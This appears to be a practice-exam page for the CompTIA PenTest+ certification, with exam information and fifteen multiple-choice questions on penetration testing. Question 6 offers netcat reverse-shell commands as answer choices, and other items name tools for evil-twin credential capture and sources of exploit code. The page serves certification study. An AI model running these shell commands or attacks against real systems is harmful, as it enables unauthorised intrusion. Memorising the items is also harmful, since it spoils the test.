00:15:00

CompTIA PenTest+ Practice Test (PT0-002)

Use the form below to configure your CompTIA PenTest+ Practice Test (PT0-002). The practice test can be configured to only include certain exam objectives and domains. You can choose between 5-100 questions and set a time limit.

Logo for CompTIA PenTest+ PT0-002
Questions
Number of questions in the practice test
Free users are limited to 20 questions, upgrade to unlimited
Seconds Per Question
Determines how long you have to finish the practice test
Exam Objectives
Which exam objectives should be included in the practice test

CompTIA PenTest+ PT0-002 Information

CompTIA PenTest+ (PT0-002) Exam

The CompTIA PenTest+ (PT0-002) certification is designed for cybersecurity professionals who specialize in penetration testing and vulnerability assessment. It validates hands-on skills in planning, conducting, and reporting penetration tests for organizations. This certification is vendor-neutral and focuses on real-world scenarios, making it relevant for security professionals working with various technologies and environments.

Exam Overview

The PT0-002 exam consists of a maximum of 85 questions, including multiple-choice and performance-based questions. Candidates have 165 minutes to complete the test. The exam costs $392 USD. A passing score is 750 on a scale of 100 to 900. The certification is valid for three years and can be renewed through CompTIA’s continuing education program.

Exam Content

The PT0-002 exam covers five main domains: planning and scoping, information gathering and vulnerability scanning, attacks and exploits, reporting and communication, and tools and code analysis. Planning and scoping include engagement rules, compliance, and risk assessment. Information gathering and vulnerability scanning focus on reconnaissance, fingerprinting, and scanning techniques. Attacks and exploits test knowledge of network, web, wireless, and physical attacks. Reporting and communication cover documentation, remediation, and risk communication. Tools and code analysis assess scripting, automation, and exploit development.

Who Should Take This Exam?

The CompTIA PenTest+ certification is ideal for cybersecurity professionals working as penetration testers, security analysts, vulnerability assessment analysts, or red team members. It is recommended for individuals with at least three to four years of hands-on cybersecurity experience. The certification is also useful for IT professionals who want to advance their careers in offensive security.

How to Prepare

Candidates should review the official CompTIA PenTest+ Exam Objectives and study materials provided by CompTIA. Practical experience with penetration testing tools such as Metasploit, Nmap, and Burp Suite is essential. Practice exams can help assess readiness and identify weak areas. Hands-on labs and ethical hacking courses can further strengthen skills.

Summary

The CompTIA PenTest+ (PT0-002) certification is a valuable credential for cybersecurity professionals specializing in penetration testing and vulnerability assessment. It validates hands-on skills in ethical hacking, exploit development, and security testing. This certification is ideal for those pursuing careers in offensive security and ethical hacking.

Free CompTIA PenTest+ PT0-002 Practice Test

Press start when you are ready, or press Change to modify any settings for the practice test.

  • Questions: 15
  • Time: Unlimited
  • Included Topics:
    Planning and Scoping
    Information Gathering and Vulnerability Scanning
    Attacks and Exploits
    Reporting and Communication
    Tools and Code Analysis
Question 1 of 15

As a penetration tester, you have been tasked to assess the security of a company's wireless infrastructure. You decide to simulate an evil twin attack to test the network's resilience to credential theft. Which tool would you use to create a rogue access point that replicates the company's WPA2-Enterprise network in order to capture employee credentials?

  • You selected this option

    Implement Kismet for network detection and packet sniffing on the target wireless network.

  • You selected this option

    Use EAPHammer to create the rogue access point and facilitate the attack to capture credentials.

  • You selected this option

    Deploy mdk4 to conduct a denial-of-service attack on the network, effectively disrupting the wireless services.

  • You selected this option

    Utilize Aircrack-ng to crack the WPA2 password and gain unauthorized access to sensitive information.

Question 2 of 15

During a penetration test, you are tasked with automating the extraction of form field names from a collection of HTML files. Which programming language would be most efficient to employ for writing a script to perform this operation, considering its powerful libraries for parsing HTML and XML?

  • You selected this option

    JavaScript

  • You selected this option

    Python

  • You selected this option

    Perl

  • You selected this option

    Ruby

Question 3 of 15

During an active reconnaissance phase, a penetration tester is using a tool to gather information about valid usernames on a target system. Which of the following activities best describes this process?

  • You selected this option

    DNS lookup

  • You selected this option

    User enumeration

  • You selected this option

    OS fingerprinting

  • You selected this option

    Packet crafting

Question 4 of 15

What type of control is implemented when using a fingerprint scanner to restrict access to a secure data center?

  • You selected this option

    Time-of-day restriction

  • You selected this option

    Mandatory vacation

  • You selected this option

    Biometric control

  • You selected this option

    Encryption control

  • You selected this option

    Network segmentation

  • You selected this option

    Role-based access control

Question 5 of 15

Which data structure is non-linear and consists of nodes connected by edges, where nodes may have zero or more child nodes, typically used to represent hierarchical information?

  • You selected this option

    Graph

  • You selected this option

    List

  • You selected this option

    Tree

  • You selected this option

    Stack

Question 6 of 15

When tasked with establishing a reverse shell on a target machine, which command using the discussed tool best fits the scenario?

  • You selected this option

    nc -v 192.168.1.10 4444

  • You selected this option

    nc -e /bin/sh 192.168.1.10 4444

  • You selected this option

    nc -lp 4444 -e /bin/sh

  • You selected this option

    nc -lvp 4444

Question 7 of 15

After completing a successful penetration testing engagement, you are required to perform data destruction to ensure no residual data from the test remains on the client's systems or your own equipment. Which of the following methods is the most appropriate for securely eradicating files containing sensitive information collected during the testing?

  • You selected this option

    Delete the files and then empty the recycle bin or trash folder on all devices used.

  • You selected this option

    Use an approved overwrite utility to perform a secure wipe of storage devices.

  • You selected this option

    Format the drives on which sensitive data is stored.

  • You selected this option

    Encrypt the data on the drives without overwriting the original files.

Question 8 of 15

You are preparing for a penetration test within a European Union country that has strict privacy laws. Due to the nature of the test, you need to use packet sniffing tools to analyze network traffic. Which of the following actions is most appropriate according to tool restriction considerations?

  • You selected this option

    Exclude the use of packet sniffing tools from the penetration test to avoid any conflict with the local privacy laws.

  • You selected this option

    Use packet sniffing tools only during off-hours to minimize the impact on the client’s network and reduce the risk of violating privacy laws.

  • You selected this option

    Request written authorization from the client specifically allowing the use of packet sniffing tools during the penetration test.

  • You selected this option

    Proceed with using packet sniffing tools without client notification, since you are conducting a penetration test to enhance security.

Question 9 of 15

During an engagement, a penetration tester needs to organize network host addresses along with an associated list of services running on specific ports for each host. Which data structure is MOST efficient for mapping this type of related information?

  • You selected this option

    Trees with host addresses as root nodes and services as their subsequent branches

  • You selected this option

    Sequential arrays where each pair of host addresses and service lists are stored one after the other

  • You selected this option

    Dictionaries with host addresses as keys paired with value lists detailing services

  • You selected this option

    Lists in which host addresses and their corresponding service details are added in order

Question 10 of 15

During a passive reconnaissance phase, a penetration tester is gathering information on a target organization. They want to determine the technology stack used by the company as well as potential vulnerabilities associated with it. Which of the following techniques would BEST aid in achieving this objective?

  • You selected this option

    Identifying cryptographic flaws in the organization's SSL certificates to deduce the technology stack.

  • You selected this option

    Reviewing job listings from the company to discover the technology stack mentioned within them.

  • You selected this option

    Performing DNS lookups to determine the company's domain name system structure.

  • You selected this option

    Analyzing website archives and cached content for historical changes to the company's web presence.

Question 11 of 15

During a penetration testing engagement, your team has identified an application that is vulnerable to command injection due to insufficient input validation. In your final report, what is the most appropriate process-level remediation recommendation to address this specific vulnerability?

  • You selected this option

    Advise the client to update their application frameworks to the latest versions to avoid command injection.

  • You selected this option

    Suggest increasing the complexity of input validation rules within the application code.

  • You selected this option

    Recommend the implementation of proper input sanitization and the use of prepared statements or parameterized queries.

  • You selected this option

    Instruct the client to configure the existing Web Application Firewall (WAF) to block command injection attacks.

Question 12 of 15

While conducting a penetration test, you find that a critical application used by the target organization is susceptible to a recently discovered vulnerability. You need to find a proof-of-concept exploit to test the system's defenses against this vulnerability. Which of the following resources is most appropriate for locating the specific exploit code?

  • You selected this option

    Vendor's security bulletin

  • You selected this option

    Packet Storm

  • You selected this option

    Official CVE website

  • You selected this option

    Common Vulnerability Scoring System (CVSS) database

Question 13 of 15

You are preparing to conduct a penetration test for a new client. The client's legal team has forwarded you a document that outlines the objectives, deliverables, timelines, and tasks associated with the engagement. Which document are you most likely reviewing to understand these details before beginning the penetration test?

  • You selected this option

    Service-level agreement (SLA)

  • You selected this option

    Master service agreement (MSA)

  • You selected this option

    Statement of work (SOW)

  • You selected this option

    Non-disclosure agreement (NDA)

Question 14 of 15

Tokens issued by a server during a session can be scoped strictly enough to prevent interception and reuse by an unauthorized party.

  • You selected this option

    False

  • You selected this option

    True

Question 15 of 15

When performing a penetration test for an organization, what aspect of the SLA would BEST ensure that the expectations for the performance of the security testing are clearly defined and understood by both the service provider and the client?

  • You selected this option

    Stating the required qualifications of the penetration testers

  • You selected this option

    Documenting the legal ramifications of a data breach

  • You selected this option

    Detailing the financial penalties for non-performance

  • You selected this option

    Providing an inventory of tools to be used in testing

  • You selected this option

    Outlining the security frameworks to learn for compliance

  • You selected this option

    Setting clear metrics for service delivery